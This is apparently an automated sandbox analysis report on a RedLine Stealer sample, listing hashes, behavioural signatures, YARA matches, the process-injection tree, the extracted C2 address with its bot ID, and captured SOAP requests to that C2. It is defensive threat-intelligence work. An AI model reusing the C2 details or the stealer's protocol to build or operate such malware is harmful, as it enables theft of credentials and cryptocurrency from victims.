Edit tour

Windows Analysis Report
YPSvIjQCzd.exe

Overview

General Information

Sample name:	YPSvIjQCzd.exe renamed because original name is a hash value
Original sample name:	901a623dbccaa22525373cd36195ee14.exe
Analysis ID:	1461860
MD5:	901a623dbccaa22525373cd36195ee14
SHA1:	9adb6dddb68cd7e116da9392e7ee63a8fa394495
SHA256:	b5e250a95073b5dfe33f66c13cc89da0fc8d3af226e5efb06bb8fcfd9a4cd6ec
Tags:	32exeRedLineStealertrojanupx
Infos:

Detection

RedLine

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected RedLine Stealer

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Uses known network protocols on non-standard ports

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

OS version to string mapping found (often used in BOTs)

PE file contains executable resources (Code or Archives)

Potential key logger detected (key state polling based)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

YPSvIjQCzd.exe (PID: 7568 cmdline: "C:\Users\user\Desktop\YPSvIjQCzd.exe" MD5: 901A623DBCCAA22525373CD36195EE14)

RegSvcs.exe (PID: 7632 cmdline: "C:\Users\user\Desktop\YPSvIjQCzd.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

conhost.exe (PID: 7640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": ["185.38.142.10:7474"], "Bot Id": "wordfile"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.1345378402.0000000001500000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.1345378402.0000000001500000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000001.00000002.1345378402.0000000001500000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField
00000001.00000002.1345378402.0000000001500000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165ee:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165cf:$v2_6: GetUpdates
00000003.00000002.1480270706.0000000000402000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.1480270706.0000000000402000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000003.00000002.1480270706.0000000000402000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x133ca:$a4: get_ScannedWallets 0x12228:$a5: get_ScanTelegram 0x1304e:$a6: get_ScanGeckoBrowsersPaths 0x10e6a:$a7: <Processes>k__BackingField 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1079e:$a9: <ScanFTP>k__BackingField
Process Memory Space: YPSvIjQCzd.exe PID: 7568	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: YPSvIjQCzd.exe PID: 7568	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: YPSvIjQCzd.exe PID: 7568	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x9450c:$a4: get_ScannedWallets 0x933b3:$a5: get_ScanTelegram 0x94195:$a6: get_ScanGeckoBrowsersPaths 0x92046:$a7: <Processes>k__BackingField 0x8f579:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x9197a:$a9: <ScanFTP>k__BackingField
Process Memory Space: RegSvcs.exe PID: 7632	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 7632	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 7632	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x8add0:$a4: get_ScannedWallets 0x89c77:$a5: get_ScanTelegram 0x8aa59:$a6: get_ScanGeckoBrowsersPaths 0x8890a:$a7: <Processes>k__BackingField 0x85e3d:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x8823e:$a9: <ScanFTP>k__BackingField
Click to see the 8 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
3.2.RegSvcs.exe.400000.0.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField
3.2.RegSvcs.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165ee:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165cf:$v2_6: GetUpdates
1.2.YPSvIjQCzd.exe.1500000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.YPSvIjQCzd.exe.1500000.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
1.2.YPSvIjQCzd.exe.1500000.1.raw.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField
1.2.YPSvIjQCzd.exe.1500000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165ee:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165cf:$v2_6: GetUpdates
1.2.YPSvIjQCzd.exe.1500000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.YPSvIjQCzd.exe.1500000.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
1.2.YPSvIjQCzd.exe.1500000.1.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x117ca:$a4: get_ScannedWallets 0x10628:$a5: get_ScanTelegram 0x1144e:$a6: get_ScanGeckoBrowsersPaths 0xf26a:$a7: <Processes>k__BackingField 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0xeb9e:$a9: <ScanFTP>k__BackingField
1.2.YPSvIjQCzd.exe.1500000.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0xe68a:$u7: RunPE 0x11d41:$u8: DownloadAndEx 0x7330:$pat14: , CommandLine: 0x11279:$v2_1: ListOfProcesses 0xe88b:$v2_2: get_ScanVPN 0xe92e:$v2_2: get_ScanFTP 0xf61e:$v2_2: get_ScanDiscord 0x1060c:$v2_2: get_ScanSteam 0x10628:$v2_2: get_ScanTelegram 0x106ce:$v2_2: get_ScanScreen 0x11416:$v2_2: get_ScanChromeBrowsersPaths 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths 0x11709:$v2_2: get_ScanBrowsers 0x117ca:$v2_2: get_ScannedWallets 0x117f0:$v2_2: get_ScanWallets 0x11810:$v2_3: GetArguments 0xfed9:$v2_4: VerifyUpdate 0x147ee:$v2_4: VerifyUpdate 0x11bca:$v2_5: VerifyScanRequest 0x112c6:$v2_6: GetUpdates 0x147cf:$v2_6: GetUpdates
Click to see the 7 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 1.2.YPSvIjQCzd.exe.1500000.1.raw.unpack

Malware Configuration Extractor: RedLine {"C2 url": ["185.38.142.10:7474"], "Bot Id": "wordfile"}

Multi AV Scanner detection for submitted file

Source: YPSvIjQCzd.exe

ReversingLabs: Detection: 40%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: YPSvIjQCzd.exe

Joe Sandbox ML: detected

Source: YPSvIjQCzd.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: wntdll.pdbUGP source: YPSvIjQCzd.exe, 00000001.00000003.1336388320.0000000003DF0000.00000004.00001000.00020000.00000000.sdmp, YPSvIjQCzd.exe, 00000001.00000003.1335705699.0000000003F90000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: YPSvIjQCzd.exe, 00000001.00000003.1336388320.0000000003DF0000.00000004.00001000.00020000.00000000.sdmp, YPSvIjQCzd.exe, 00000001.00000003.1335705699.0000000003F90000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_00834696 GetFileAttributesW,FindFirstFileW,FindClose,	1_2_00834696
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_0083C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	1_2_0083C9C7
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_0083C93C FindFirstFileW,FindClose,	1_2_0083C93C
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_0083F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	1_2_0083F200
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_0083F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	1_2_0083F35D
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_0083F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	1_2_0083F65E
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_00833A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	1_2_00833A2B
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_00833D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	1_2_00833D4E
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_0083BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	1_2_0083BF27

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 185.38.142.10:7474

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 7474
Source: unknown	Network traffic detected: HTTP traffic on port 7474 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 7474 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 7474
Source: unknown	Network traffic detected: HTTP traffic on port 7474 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 7474 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 7474
Source: unknown	Network traffic detected: HTTP traffic on port 7474 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 7474
Source: unknown	Network traffic detected: HTTP traffic on port 7474 -> 49711

Source: global traffic

TCP traffic: 192.168.2.7:49708 -> 185.38.142.10:7474

Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.38.142.10:7474Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 185.38.142.10:7474Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 185.38.142.10:7474Content-Length: 937317Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 185.38.142.10:7474Content-Length: 937309Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Source: Joe Sandbox View

ASN Name: NETSOLUTIONSNL NETSOLUTIONSNL

Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10

Source: C:\Users\user\Desktop\YPSvIjQCzd.exe

Code function: 1_2_008425E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

1_2_008425E2

Source: global traffic

DNS traffic detected: DNS query: api.ip.sb

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.38.142.10:7474Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Source: RegSvcs.exe, 00000003.00000002.1481340987.0000000002E6F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1481340987.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1481340987.0000000002E63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.38.142.10:7474
Source: RegSvcs.exe, 00000003.00000002.1481340987.0000000002D51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.38.142.10:7474/
Source: RegSvcs.exe, 00000003.00000002.1481340987.0000000002E63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.38.142.10:7474t-
Source: RegSvcs.exe, 00000003.00000002.1481340987.0000000002E6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: RegSvcs.exe, 00000003.00000002.1481340987.0000000002D51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: RegSvcs.exe, 00000003.00000002.1481340987.0000000002DA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: RegSvcs.exe, 00000003.00000002.1481340987.0000000002D51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: RegSvcs.exe, 00000003.00000002.1481340987.0000000002D51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
Source: RegSvcs.exe, 00000003.00000002.1481340987.0000000002D51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: RegSvcs.exe, 00000003.00000002.1481340987.0000000002D51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegSvcs.exe, 00000003.00000002.1481340987.0000000002E63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: RegSvcs.exe, 00000003.00000002.1481340987.0000000002D51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/0
Source: RegSvcs.exe, 00000003.00000002.1481340987.0000000002D51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
Source: RegSvcs.exe, 00000003.00000002.1481340987.0000000002D51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
Source: RegSvcs.exe, 00000003.00000002.1481340987.0000000002D51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
Source: RegSvcs.exe, 00000003.00000002.1481340987.0000000002D51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
Source: RegSvcs.exe, 00000003.00000002.1481340987.0000000002E63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
Source: RegSvcs.exe, 00000003.00000002.1481340987.0000000002D51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
Source: RegSvcs.exe, 00000003.00000002.1481340987.0000000002E6F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1481340987.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1481340987.0000000002DA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
Source: RegSvcs.exe, 00000003.00000002.1481340987.0000000002D51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
Source: RegSvcs.exe, 00000003.00000002.1481340987.0000000002D51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
Source: RegSvcs.exe, 00000003.00000002.1481340987.0000000002D51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
Source: tmpE220.tmp.3.dr, tmpE1ED.tmp.3.dr, tmpE1FE.tmp.3.dr, tmpE241.tmp.3.dr, tmpE230.tmp.3.dr, tmpA8A9.tmp.3.dr, tmpE20F.tmp.3.dr, tmp1AF5.tmp.3.dr, tmpE1DC.tmp.3.dr, tmpA8BA.tmp.3.dr, tmpA8A8.tmp.3.dr, tmpE1FD.tmp.3.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: YPSvIjQCzd.exe, 00000001.00000002.1345378402.0000000001500000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1480270706.0000000000402000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
Source: YPSvIjQCzd.exe, 00000001.00000002.1345378402.0000000001500000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1480270706.0000000000402000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
Source: tmpE220.tmp.3.dr, tmpE1ED.tmp.3.dr, tmpE1FE.tmp.3.dr, tmpE241.tmp.3.dr, tmpE230.tmp.3.dr, tmpA8A9.tmp.3.dr, tmpE20F.tmp.3.dr, tmp1AF5.tmp.3.dr, tmpE1DC.tmp.3.dr, tmpA8BA.tmp.3.dr, tmpA8A8.tmp.3.dr, tmpE1FD.tmp.3.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: tmpE220.tmp.3.dr, tmpE1ED.tmp.3.dr, tmpE1FE.tmp.3.dr, tmpE241.tmp.3.dr, tmpE230.tmp.3.dr, tmpA8A9.tmp.3.dr, tmpE20F.tmp.3.dr, tmp1AF5.tmp.3.dr, tmpE1DC.tmp.3.dr, tmpA8BA.tmp.3.dr, tmpA8A8.tmp.3.dr, tmpE1FD.tmp.3.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: tmpE220.tmp.3.dr, tmpE1ED.tmp.3.dr, tmpE1FE.tmp.3.dr, tmpE241.tmp.3.dr, tmpE230.tmp.3.dr, tmpA8A9.tmp.3.dr, tmpE20F.tmp.3.dr, tmp1AF5.tmp.3.dr, tmpE1DC.tmp.3.dr, tmpA8BA.tmp.3.dr, tmpA8A8.tmp.3.dr, tmpE1FD.tmp.3.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
